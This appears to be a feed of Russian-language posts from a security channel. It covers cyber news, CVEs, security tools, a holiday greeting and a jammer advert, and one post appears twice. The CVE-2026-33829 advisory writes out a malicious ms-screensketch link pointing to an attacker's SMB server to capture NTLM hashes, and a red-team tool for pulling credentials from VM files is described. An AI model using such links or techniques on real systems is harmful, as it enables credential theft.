AP Security

#news Контртерроризм по-новому: США вписали наступательные хакерские атаки в национальную стратегию 📶 Администрация США включила наступательные кибероперации в новую контртеррористическую стратегию. Документ предусматривает применение цифровых операций против структур и лиц, считающихся Вашингтоном угрозой американским интересам, а также против пособников подготовки атак на американцев. Сам формат подобных операций в стратегии не раскрывается, но прямое упоминание кибератак показывает превращение цифровых инструментов в часть государственной силовой политики. Для союзников США новая стратегия тоже будет иметь значение. При расширении применения наступательных операций в контртеррористической политике другие страны могут копировать модель или ссылаться на неё для обоснования собственных действий. Источник: https://cisoclub.ru/kontrterrorizm-po-novomu-ssha-vpisali-nastupatelnye-hakerskie-ataki-v-nacionalnuju-strategiju/

#cve CVE-2026-33829 📱 CVE-2026-33829 — это уязвимость в стандартном приложении Windows «Ножницы» (Snipping Tool), раскрывающая хеши Net-NTLMv2 пользователя. Злоумышленнику достаточно заставить жертву перейти по специально созданной ссылке, чтобы перехватить данные для авторизации. Сам же PoC демонстрирует атаку в локальной сети. ➡️ Проблема кроется в некорректной обработке URI-схемы ms-screensketch. При попытке открыть ссылку вида ms-screensketch:edit?filePath=\\server_злоумышленника\file.png происходит попытка подключения к SMB-серверу, автоматически отправляя хеш пароля. В случае отсутствия возможности обновления системы до последней версии, наблюдайте за активностью порта 445 (если он не заблокирован на границе сети), а также проинформируйте сотрудников, что стандартные приложения вроде «Ножниц» не должны открываться по запросу из браузера или почты.

#рубрика

От всей души поздравляем Вас с Днем Победы — 9 мая. Этот праздник навсегда останется символом величайшего мужества, несгибаемой воли и подлинной любви к Родине. Мы преклоняемся перед подвигом ветеранов и тружеников тыла, которые ценой неимоверных усилий отстояли мир на земле. Их героизм - это нравственный ориентир для всех нас. Особые слова благодарности тем, кто сейчас, в наши дни, с оружием в руках защищает Родину, продолжает ратные традиции дедов и прадедов, охраняет покой и безопасность нашей страны, отстаивает её интересы и суверенитет. Ваша преданность долгу и мужество вызывают глубочайшее уважение. Желаем всем благополучия, чистого неба над головой и уверенности в завтрашнем дне. Пусть память о Великой Победе всегда наполняет наши сердца гордостью и дает силы для новых свершений.

#soc #tools OSS2Falco 🖥 Falco — это популярный инструмент с открытым исходным кодом для обеспечения безопасности облачных сред и контейнеров, который оповещает о подозрительной активности. OSS2Falco — это набор правил Falco, преобразованных из популярных инструментов и наборов правил с открытым исходным кодом.

#byapsecurity Подавитель сотовой связи БЛ 2020 🛡 Блокиратор сотовой связи и беспроводного доступа «БЛ-2020», предназначен для предотвращения несанкционированной передачи информации по каналам сотовой связи и сетям беспроводного доступа, а также исключения возможности дистанционного управления различного рода устройствами. Отличительные особенности: ✔️изделие имеет модульную конструкцию, которая позволяет «собирать» блокиратор, исходя из конкретных требований заказчика. Базовая поставка может включать один или два модуля изделия; ✔️изделие обеспечивает блокирование самых распространенных на сегодняшний день стандартов сотовой связи 2G,3G,4G и сетей беспроводного доступа Bluetooth, Wi-Fi, в том числе в диапазоне 5850-5950МГц; ✔️выходная мощность на антенном выходе на нагрузке 50 Ом устанавливается в диапазоне 0,5- 2,0 Вт; ✔️внешние штыревые антенны позволяют создавать круговую зону блокирования, а применение направленных антенн обеспечивают локальную зону блокирования; ✔️блокирование осуществляется постоянно в режиме «заградительная помеха». Зона блокирования в этом случае регулируется только мощностью блокирующего сигнала и применением определенных антенн. Подробнее ✍️: https://apsecurity.ru/products/cellular-communication-blocker/bl2020

#tools Cybersecurity AI (CAI) 🖥 Cybersecurity AI (CAI) — это легковесная платформа с открытым исходным кодом, которая позволяет специалистам по безопасности создавать и внедрять автоматизированные решения для наступательных и оборонительных действий в ИБ на основе искусственного интеллекта. Для тех, кто собирается тестировать данное решение, прикладываем статью, в которой автор опробовал инструмент на популярных тренировочных ресурсах и показал результаты работы.

#рубрика

#pentest Атакуем LLM 📥 Коротко и на примерах автор статьи показывает о существующих типах атак на LLM и влиянии их на бизнес. Важная тема для рассуждения в эпоху внедрения новой технологии в бизнес - процессы. Приятного прочтения ⭐️

#event Pentest award 2026 открыл прием заявок!🔥 Каждый год у этичных хакеров появляется возможность заявить о себе, продемонстрировать свои навыки и творческий подход к решению задач в области тестирования на проникновение. Главный приз за победу — статуэтка и макбук! За вторые и третьи места призеры получат айфоны и смарт-часы. Церемония награждения состоится 14 августа на Красном Октябре Заявка на премию — это рассказ о лучшем проекте в свободной форме. Не нужно раскрывать эксплоиты, любые шаги в цепочке эксплуатации могут быть полностью анонимны, а детали могут быть скрыты, важно отразить сам подход и идею. ✔️ Отправляйте заявки на сайте, участвуйте и побеждайте!

#news Хакеры захватывают домашние роутеры россиян и используют их для кражи данных и атак 🗣 Хакеры научились перехватывать домашние маршрутизаторы пользователей и получают под своё крыло весь интернет-трафик вместе с доступом к подключённой технике от смартфонов до систем умного дома. Через правку настроек роутера преступники подменяют DNS-записи и уводят хозяина на поддельные сайты ради кражи логинов, паролей и платёжных реквизитов. Об этом рассказали в управлении по борьбе с противоправным использованием информационно-коммуникационных технологий МВД России. Утечка данных составляет лишь верхушку айсберга. Взломанные устройства охотно запрягают в дальнейшие атаки на посторонние цели. Через такие роутеры расползается спам-рассылка, катятся распределённые атаки на серверы компаний и перебираются пароли к чужим учётным записям. Весь этот трафик числится исходящим от рядового пользователя, чьё железо угодило в чужие руки. Хозяину сети подобный расклад сулит отдельную порцию неприятностей. Вся преступная суета уходит наружу с его IP-адреса, и в разбирательствах с правоохранителями крайним рискует оказаться именно он. Реальный контроль над устройством к этому моменту давно ушёл на сторону, а отмываться от обвинений приходится задним числом. Источник: https://cisoclub.ru/hakery-zahvatyvajut-domashnie-routery-rossijan-i-ispolzujut-ih-dlja-krazhi-dannyh-i-atak/

#redteam #tools VMkatz✏️ Утилита VMkatz предназначена для извлечения секретов (NTLM-хеши, ключи DPAPI, билеты Kerberos, LSA-секреты, NTDS.dit, ключи BitLocker) напрямую из файлов виртуальных машин (VMDK, VMSN, SAV), работая с ними на NAS или гипервизоре без необходимости выгрузки образов дисков. 📌 Может быть полезна при Red Team операциях, а также Purple Team мероприятиях.

#news Минцифры готовит штрафы за срыв перехода на доверенные ПАК на объектах КИИ⚠️ Минцифры готовит новые штрафы для тех, кто затянет переход на доверенные программно-аппаратные комплексы на объектах критической информационной инфраструктуры. Речь идёт о поправках в КоАП, которые ведомство разрабатывает по поручению вице-премьера Дмитрия Григоренко. Санкции хотят распространить на госорганы, госкомпании и организации с госучастием, если они не уложатся в установленные сроки перехода. Сама логика у государства здесь довольно жёсткая: значимые объекты КИИ должны поэтапно уходить от иностранных решений и переходить на доверенные отечественные ПАК. Этот курс был закреплён ещё раньше, а финальной точкой сейчас считается 1 января 2030 года — именно к этой дате на таких объектах должен быть завершён переход. По оценкам экспертов, переход на новые ПАК у части заказчиков идёт тяжело, а общий уровень импортозамещения на таких объектах всё ещё далёк от стопроцентного. На этом фоне желание государства подстегнуть процесс рублём выглядит вполне ожидаемо. Тем более что, по данным Минцифры, к марту 2025 года более двух третей значимых объектов КИИ госорганов и госкомпаний уже перешли на отечественное ПО. Источник: https://www.anti-malware.ru/news/2026-04-20-111332/49764

#forensics #tools Hayabusa 📌 Hayabusa - полезная утилита на Rust, которая применяется на этапе триажа инцидентов информационной безопасности для быстрой идентификации аномалий (например, брутфорс, создание служб, изменение политик, запуск процессов из временных директорий) и снижения количества ложноположительных срабатываний.

#forensics #tools Hayabusa 📌 Hayabusa - полезная утилита на Rust, которая применяется на этапе триажа инцидентов информационной безопасности для быстрой идентификации аномалий (например, брутфорс, создание служб, изменение политик, запуск процессов из временных директорий) и снижения количества ложноположительных срабатываний.

#news Новая дыра в Windows Defender грозит полным захватом системы ⚠️ ◽️Исследователь, известный под псевдонимом Chaotic Eclipse и работающий на GitHub под ником Nightmare-Eclipse, сообщил о новой 0-day уязвимости в Windows Defender, которую он назвал RedSun. Ранее тот же исследователь сообщал о другой серьёзной бреши — BlueHammer. ◽️По словам исследователя, RedSun — это уязвимость, позволяющая повысить привилегии и затрагивающая встроенный защитный механизм Windows. ◽️Ирония в том, что баг якобы позволяет использовать Defender не для удаления опасных файлов, а наоборот — как инструмент, который помогает доставить вредоносную нагрузку в систему. В основе проблемы, как утверждается, лежит логическая ошибка в обработке определённых метаданных файлов. Источник: https://www.anti-malware.ru/news/2026-04-16-111332/49724

#pentest #cve #exploit CVE-2026-20817 ⚙️ Уязвимость службы регистрации ошибок Windows Error Reporting Service операционной системы Windows позволяет нарушителю повысить свои привилегии в системе. Согласно BDU:2026-00482 - уязвимости присвоен высокий уровень опасности Ознакомиться с PoC и изучить детали уязвимости можно по следующей ссылке.

#news ИИ-режим поиска Google даёт миллионы неточных ответов при высокой общей точности🔩 Функция AI Overviews в поиске Google правильно отвечает примерно в 90% случаев, но из-за колоссального объёма запросов даже такой показатель оборачивается десятками миллионов некорректных ответов ежедневно. К такому выводу пришли журналисты The New York Times совместно со стартапом Oumi, протестировавших систему на бенчмарке SimpleQA от OpenAI с более чем 4000 проверяемых вопросов. При использовании Gemini 2.5 точность составила около 85%, после перехода на Gemini 3 выросла с 85% до 91%. В ходе проверки обнаружились проблемы с тем, как система объединяет данные из разных источников. Один из примеров — неверное определение даты превращения дома Боба Марли в музей, хотя корректные сведения присутствовали в исходных материалах. Это указывает на сложности не с поиском информации, а с её интерпретацией и выбором нужного факта среди нескольких источников.